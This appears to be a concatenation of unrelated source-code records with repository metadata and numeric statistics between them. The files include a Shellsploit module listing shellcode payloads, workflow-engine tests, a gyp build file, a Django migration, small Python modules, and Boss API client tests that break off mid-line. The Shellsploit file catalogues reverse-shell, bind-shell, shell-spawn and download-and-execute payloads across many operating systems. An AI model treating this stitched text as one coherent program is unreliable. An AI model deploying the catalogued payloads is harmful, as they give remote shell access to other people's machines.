T0mcat3r/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
null
null
null
shell/core/shellcodes.py
T0mcat3r/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
28
2017-08-15T05:38:27.000Z
2020-12-31T03:39:38.000Z
#------------------Bombermans Team---------------------------------# #Author : B3mB4m #Concat : b3mb4m@protonmail.com #Project : https://github.com/b3mb4m/Shellsploit #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE #------------------------------------------------------------------# from .color import * def shellcodelist( getlist=False): if getlist == False: print (bcolors.GREEN+""" Linux x86 =========== linux86/exec linux86/binsh_spawn linux86/read linux86/chmod linux86/tcp_bind linux86/reverse_tcp Linux x64 =========== linux64/binsh_spawn linux64/read linux64/tcp_bind linux64/reverse_tcp Linux x86/x64 [Works on both] =========== linux/binsh_spawn linux/read linux/tcp_bind linux/reverse_tcp Linux ARM =========== linux_arm/exec linux_arm/binsh_spawn linux_arm/chmod linux_arm/reverse_tcp Linux MIPS =========== linux_mips/binsh_spawn linux_mips/chmod linux_mips/tcp_bind Solaris x86 =========== solarisx86/binsh_spawn solarisx86/read solarisx86/reverse_tcp solarisx86/tcp_bind Windows =========== windows/exec windows/messagebox windows/download&execute windows/reverse_tcp windows/tcp_bind OSX x86 =========== osx86/tcp_bind osx86/binsh_spawn osx86/reverse_tcp OSX x64 =========== osx64/binsh_spawn osx64/reverse_tcp osx64/tcp_bind FreeBSD x86 ============ FreeBSDx86/binsh_spawn FreeBSDx86/read FreeBSDx86/tcp_bind FreeBSDx86/reverse_tcp FreeBSDx86/reverse_tcp2 (through /bin/sh) FreeBSDx86/exec FreeBSD x64 ============ FreeBSDx64/exec FreeBSDx64/binsh_spawn FreeBSDx64/tcp_bind FreeBSDx64/reverse_tcp """ + bcolors.ENDC) else: return [ "linux86/exec", "linux86/binsh_spawn", "linux86/read", "linux86/chmod", "linux86/tcp_bind", "linux86/reverse_tcp", "linux64/binsh_spawn", "linux64/read", "linux64/tcp_bind", "linux64/reverse_tcp", "linux/binsh_spawn", "linux/read", "linux/tcp_bind", "linux/reverse_tcp", "linux_arm/exec", "linux_arm/binsh_spawn", "linux_arm/chmod", "linux_arm/reverse_tcp", "linux_mips/binsh_spawn", "linux_mips/chmod", "linux_mips/tcp_bind", "solarisx86/binsh_spawn", "solarisx86/read", "solarisx86/reverse_tcp", "solarisx86/tcp_bind", "windows/exec", "windows/messagebox", "windows/download&execute", "windows/reverse_tcp", "windows/tcp_bind", "osx86/tcp_bind", "osx86/binsh_spawn", "osx86/reverse_tcp", "osx64/binsh_spawn", "osx64/reverse_tcp", "osx64/tcp_bind", "FreeBSDx86/binsh_spawn", "FreeBSDx86/read", "FreeBSDx86/tcp_bind", "FreeBSDx86/reverse_tcp", "FreeBSDx86/reverse_tcp2", "FreeBSDx86/exec", "FreeBSDx64/exec", "FreeBSDx64/binsh_spawn", "FreeBSDx64/tcp_bind", "FreeBSDx64/reverse_tcp", ]
15.315217
69
0.660397
330
2,818
5.409091
0.187879
0.112045
0.058824
0.022409
0.836415
0.801681
0.801681
0.801681
0.801681
0.707563
0
0.061847
0.150816
2,818
184
70
15.315217
0.684079
0.104329
0
0.090164
0
0
0.818037
0.193087
0
0
0
0
0
1
0.008197
false
0
0.008197
0
0.02459
0.008197
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
556cf77d99d9dbb7e9f8653a3e578e8c2aafb423
6,813
py
Python
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
55
2021-09-07T11:50:35.000Z
2022-03-23T13:19:38.000Z
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
64
2021-09-07T12:04:12.000Z
2022-03-29T03:47:18.000Z
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
20
2021-09-07T11:52:08.000Z
2022-03-28T08:05:22.000Z
# -*- coding: utf-8 -*- from ..base import * # noqa class TestSubprocessRefConstant(EngineTestCase): def test_ref_constant(self): sub_start = EmptyStartEvent() sub_act_1 = ServiceActivity(component_code="debug_node") sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}") sub_end = EmptyEndEvent() sub_start.extend(sub_act_1).extend(sub_end) sub_pipeline_data = Data() sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value") start = EmptyStartEvent() params = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${constant_1}")}) subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params) end = EmptyEndEvent() start.extend(subprocess).extend(end) pipeline_data = Data() pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1") pipeline = self.create_pipeline_and_run(start, data=pipeline_data) self.join_or_fail(pipeline) self.assert_pipeline_finished(pipeline) self.assert_inputs_equals(sub_act_1, "param_1", "value_1") self.test_pass() def test_ref_constant_using_splice_input(self): sub_start = EmptyStartEvent() sub_act_1 = ServiceActivity(component_code="debug_node") sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}") sub_end = EmptyEndEvent() sub_start.extend(sub_act_1).extend(sub_end) sub_pipeline_data = Data() sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.SPLICE, value="default_value") start = EmptyStartEvent() params = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${constant_1}")}) subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params) end = EmptyEndEvent() start.extend(subprocess).extend(end) pipeline_data = Data() pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1") pipeline = self.create_pipeline_and_run(start, data=pipeline_data) self.join_or_fail(pipeline) self.assert_pipeline_finished(pipeline) self.assert_inputs_equals(sub_act_1, "param_1", "value_1") self.test_pass() def test_ref_constant_using_default_value(self): sub_start = EmptyStartEvent() sub_act_1 = ServiceActivity(component_code="debug_node") sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}") sub_end = EmptyEndEvent() sub_start.extend(sub_act_1).extend(sub_end) sub_pipeline_data = Data() sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value") start = EmptyStartEvent() params = Params() subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params) end = EmptyEndEvent() start.extend(subprocess).extend(end) pipeline_data = Data() pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1") pipeline = self.create_pipeline_and_run(start, data=pipeline_data) self.join_or_fail(pipeline) self.assert_pipeline_finished(pipeline) self.assert_inputs_equals(sub_act_1, "param_1", "default_value") self.test_pass() def test_nesting_ref_constant(self): # subprocess 1 sub_start_1 = EmptyStartEvent() sub_act_1 = ServiceActivity(component_code="debug_node") sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}") sub_end_1 = EmptyEndEvent() sub_start_1.extend(sub_act_1).extend(sub_end_1) sub_pipeline_data_1 = Data() sub_pipeline_data_1.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value_1") # subprocess 2 sub_start_2 = EmptyStartEvent() params_1 = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${sub_constant_2}")}) subprocess_1 = SubProcess(start=sub_start_1, data=sub_pipeline_data_1, params=params_1) sub_end_2 = EmptyEndEvent() sub_start_2.extend(subprocess_1).extend(sub_end_2) sub_pipeline_data_2 = Data() sub_pipeline_data_2.inputs["${sub_constant_2}"] = DataInput(type=Var.PLAIN, value="default_value_2") # root flow start = EmptyStartEvent() params_2 = Params({"${sub_constant_2}": Var(type=Var.SPLICE, value="${constant}")}) subprocess_2 = SubProcess(start=sub_start_2, data=sub_pipeline_data_2, params=params_2) end = EmptyEndEvent() start.extend(subprocess_2).extend(end) pipeline_data = Data() pipeline_data.inputs["${constant}"] = Var(type=Var.PLAIN, value="value_3") pipeline = self.create_pipeline_and_run(start, data=pipeline_data) self.join_or_fail(pipeline) self.assert_pipeline_finished(pipeline) self.assert_inputs_equals(sub_act_1, "param_1", "value_3") self.test_pass() def test_nesting_ref_constant_with_same_key(self): # subprocess 1 sub_start_1 = EmptyStartEvent() sub_act_1 = ServiceActivity(component_code="debug_node") sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${same_key}") sub_end_1 = EmptyEndEvent() sub_start_1.extend(sub_act_1).extend(sub_end_1) sub_pipeline_data_1 = Data() sub_pipeline_data_1.inputs["${same_key}"] = DataInput(type=Var.PLAIN, value="default_value_1") # subprocess 2 sub_start_2 = EmptyStartEvent() params_1 = Params({"${same_key}": Var(type=Var.SPLICE, value="${same_key}")}) subprocess_1 = SubProcess(start=sub_start_1, data=sub_pipeline_data_1, params=params_1) sub_end_2 = EmptyEndEvent() sub_start_2.extend(subprocess_1).extend(sub_end_2) sub_pipeline_data_2 = Data() sub_pipeline_data_2.inputs["${same_key}"] = DataInput(type=Var.PLAIN, value="default_value_2") # root flow start = EmptyStartEvent() params_2 = Params({"${same_key}": Var(type=Var.SPLICE, value="${constant}")}) subprocess_2 = SubProcess(start=sub_start_2, data=sub_pipeline_data_2, params=params_2) end = EmptyEndEvent() start.extend(subprocess_2).extend(end) pipeline_data = Data() pipeline_data.inputs["${constant}"] = Var(type=Var.PLAIN, value="value_3") pipeline = self.create_pipeline_and_run(start, data=pipeline_data) self.join_or_fail(pipeline) self.assert_pipeline_finished(pipeline) self.assert_inputs_equals(sub_act_1, "param_1", "value_3") self.test_pass()
37.85
108
0.677675
885
6,813
4.842938
0.068927
0.100793
0.073495
0.062063
0.961036
0.961036
0.961036
0.957769
0.932571
0.924872
0
0.021085
0.199472
6,813
179
109
38.061453
0.76476
0.014384
0
0.836207
0
0
0.100358
0
0
0
0
0
0.086207
1
0.043103
false
0.043103
0.008621
0
0.060345
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
55a28f94b16e58592e0d38cf101b74f3b5923a70
3,745
gyp
Python
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
xzhan96/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
1
2021-01-07T18:51:03.000Z
2021-01-07T18:51:03.000Z
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
emilio/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
null
null
null
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
emilio/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
null
null
null
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. { 'targets': [ # { # 'target_name': 'byte_reader', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'content_metadata_provider', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'content_metadata_provider_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'exif_constants', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'exif_parser', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'exif_parser_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'external_metadata_provider', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'external_metadata_provider_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'file_system_metadata_provider', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'file_system_metadata_provider_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'function_parallel', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'function_sequence', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'id3_parser', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'image_orientation', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'image_orientation_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'image_parsers', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_cache_item', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_cache_item_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_cache_set', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_cache_set_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_dispatcher', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_item', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_model', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_model_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'metadata_parser', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'mpeg_parser', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'multi_metadata_provider', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'multi_metadata_provider_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'new_metadata_provider', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'thumbnail_model', # 'includes': ['../../../../compile_js2.gypi'], # }, # { # 'target_name': 'thumbnail_model_unittest', # 'includes': ['../../../../compile_js2.gypi'], # }, ], }
28.371212
72
0.488919
302
3,745
5.672185
0.198676
0.180969
0.325744
0.398132
0.880911
0.880911
0.844717
0.730881
0.447169
0.067717
0
0.012414
0.225634
3,745
131
73
28.587786
0.578276
0.925501
0
0
0
0
0.046358
0
0
0
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
8
e9a0991b4e70f5cb254a5f4ba1b45fc29789fcf5
67
py
Python
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
224
2020-01-02T10:46:37.000Z
2022-03-02T13:54:08.000Z
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
16
2020-03-11T09:37:58.000Z
2022-01-26T10:22:08.000Z
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
24
2020-03-24T13:53:50.000Z
2022-03-22T11:55:18.000Z
from .complex_structure_pipeline import complex_structure_pipeline
33.5
66
0.925373
8
67
7.25
0.625
0.551724
0.827586
0
0
0
0
0
0
0
0
0
0.059701
67
1
67
67
0.920635
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
7586b64d4ea47aba49b8b97587fa2a1b132698ab
1,737
py
Python
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
# Generated by Django 4.0.2 on 2022-02-21 05:52 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('accounts', '0001_initial'), ] operations = [ migrations.AddField( model_name='business', name='business_name', field=models.CharField(default=django.utils.timezone.now, max_length=100), preserve_default=False, ), migrations.AddField( model_name='loan', name='amount', field=models.DecimalField(decimal_places=2, default=0, max_digits=20), ), migrations.AddField( model_name='loan', name='borrower', field=models.CharField(default=django.utils.timezone.now, max_length=100), preserve_default=False, ), migrations.AddField( model_name='loan', name='issuer', field=models.CharField(default=django.utils.timezone.now, max_length=100), preserve_default=False, ), migrations.AddField( model_name='loan', name='loan_ref', field=models.CharField(default=django.utils.timezone.now, max_length=100), preserve_default=False, ), migrations.AddField( model_name='user', name='loan_limit', field=models.DecimalField(decimal_places=2, default=0, max_digits=20), ), migrations.AddField( model_name='user', name='phone', field=models.CharField(default=django.utils.timezone.now, max_length=100), preserve_default=False, ), ]
31.581818
86
0.582038
175
1,737
5.634286
0.297143
0.127789
0.163286
0.191684
0.737323
0.737323
0.712982
0.712982
0.712982
0.712982
0
0.034768
0.304548
1,737
54
87
32.166667
0.781457
0.025907
0
0.666667
1
0
0.063905
0
0
0
0
0
0
1
0
false
0
0.041667
0
0.104167
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
75980aff25d7c643bd7ef84609294b98bcbe2552
148
py
Python
graphgallery/nn/__init__.py
Sharpiless/GraphGallery
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
[ "MIT" ]
1
2020-11-22T10:14:58.000Z
2020-11-22T10:14:58.000Z
graphgallery/nn/__init__.py
mengliu1998/GraphGallery
025ac09e883f3e1e1b02000e086830c935884a6e
[ "MIT" ]
null
null
null
graphgallery/nn/__init__.py
mengliu1998/GraphGallery
025ac09e883f3e1e1b02000e086830c935884a6e
[ "MIT" ]
1
2020-11-22T10:14:59.000Z
2020-11-22T10:14:59.000Z
from graphgallery.nn.layers import * from graphgallery.nn.models import * from graphgallery.nn.functions import * from graphgallery.nn.init import *
37
39
0.817568
20
148
6.05
0.4
0.528926
0.595041
0.595041
0
0
0
0
0
0
0
0
0.101351
148
4
40
37
0.909774
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
75b860e992c6da08ab0fe4c3740cf7604e659306
191
py
Python
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
null
null
null
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
2
2021-03-25T21:32:16.000Z
2021-07-19T11:11:15.000Z
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
null
null
null
from challenge import solution def test_challenge(): assert solution([4]) == 0 assert solution([1]) == 1 assert solution([4, 1, 3, 2]) == 1 assert solution([4, 1, 3]) == 0
19.1
38
0.591623
28
191
4
0.428571
0.5
0.401786
0.285714
0.321429
0.321429
0
0
0
0
0
0.089655
0.240838
191
9
39
21.222222
0.682759
0
0
0
0
0
0
0
0
0
0
0
0.666667
1
0.166667
true
0
0.166667
0
0.333333
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
1
0
0
0
0
0
0
7
f930c5c638991bd332a169332c3a92818a282af0
14,768
py
Python
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
15
2017-01-13T23:06:38.000Z
2021-09-22T11:33:02.000Z
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
49
2017-04-26T13:21:26.000Z
2021-11-16T14:03:58.000Z
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
18
2017-02-17T23:12:37.000Z
2021-09-27T08:53:32.000Z
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from intern.service.boss.v1.project import ProjectService_1 from intern.resource.boss.resource import * from requests import PreparedRequest, Response, Session, HTTPError import unittest from mock import patch class TestGroup(unittest.TestCase): def setUp(self): self.prj = ProjectService_1() @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_list_groups_success(self, mock_session, mock_resp): expected = ['g1', 'g2'] mock_resp.status_code = 200 mock_resp.json.return_value = { 'groups': expected } mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = mock_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.list_groups( None, url_prefix, auth, mock_session, send_opts) self.assertEqual(expected, actual) @patch('requests.Session', autospec=True) def test_list_groups_failure(self, mock_session): fake_resp = Response() fake_resp.status_code = 403 mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.list_groups(None, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_create_group_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 201 mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.create_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_create_group_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.create_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_get_group_success(self, mock_session, mock_resp): grp_name = 'mygroup' mock_session.prepare_request.return_value = PreparedRequest() mock_resp.status_code = 200 mock_resp.json.return_value = True mock_session.send.return_value = mock_resp user = None url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.get_group( grp_name, user, url_prefix, auth, mock_session, send_opts) self.assertTrue(actual) @patch('requests.Session', autospec=True) def test_get_group_failure(self, mock_session): grp_name = 'mygroup' mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 404 mock_session.send.return_value = fake_resp user = None url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.get_group( grp_name, user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 204 mock_session.send.return_value = fake_resp user = None url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.delete_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp user = None url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.delete_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_list_group_members_success(self, mock_session, mock_resp): expected = ['john', 'mary'] mock_resp.status_code = 200 mock_resp.json.return_value = { 'members': expected } mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = mock_resp group = 'fire' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.list_group_members( group, url_prefix, auth, mock_session, send_opts) self.assertEqual(expected, actual) @patch('requests.Session', autospec=True) def test_list_group_members_failure(self, mock_session): fake_resp = Response() fake_resp.status_code = 403 mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = fake_resp group = 'fire' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.list_group_members( group, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_add_group_member_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 204 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.add_group_member( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_add_group_member_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.add_group_member( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_get_is_group_member_success(self, mock_session, mock_resp): mock_session.prepare_request.return_value = PreparedRequest() mock_resp.status_code = 200 mock_resp.json.return_value = { 'result': True } mock_session.send.return_value = mock_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.assertTrue(self.prj.get_is_group_member( 'mygroup', user, url_prefix, auth, mock_session, send_opts)) @patch('requests.Session', autospec=True) def test_get_is_group_member_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 404 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.get_group( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_member_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 204 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.delete_group_member( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_delete_group_member_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.delete_group_member( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_list_group_maintainers_success(self, mock_session, mock_resp): expected = ['john', 'mary'] mock_resp.status_code = 200 mock_resp.json.return_value = { 'maintainers': expected } mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = mock_resp group = 'fire' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.list_group_maintainers( group, url_prefix, auth, mock_session, send_opts) self.assertEqual(expected, actual) @patch('requests.Session', autospec=True) def test_list_group_maintainers_failure(self, mock_session): fake_resp = Response() fake_resp.status_code = 403 mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = fake_resp group = 'fire' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.list_group_maintainers( group, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_add_group_maintainer_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 204 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.add_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_add_group_maintainer_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp user = 'you' url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.add_group_maintainer( 'mygroup', user, url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_get_is_group_maintainer_success(self, mock_session, mock_resp): mock_session.prepare_request.return_value = 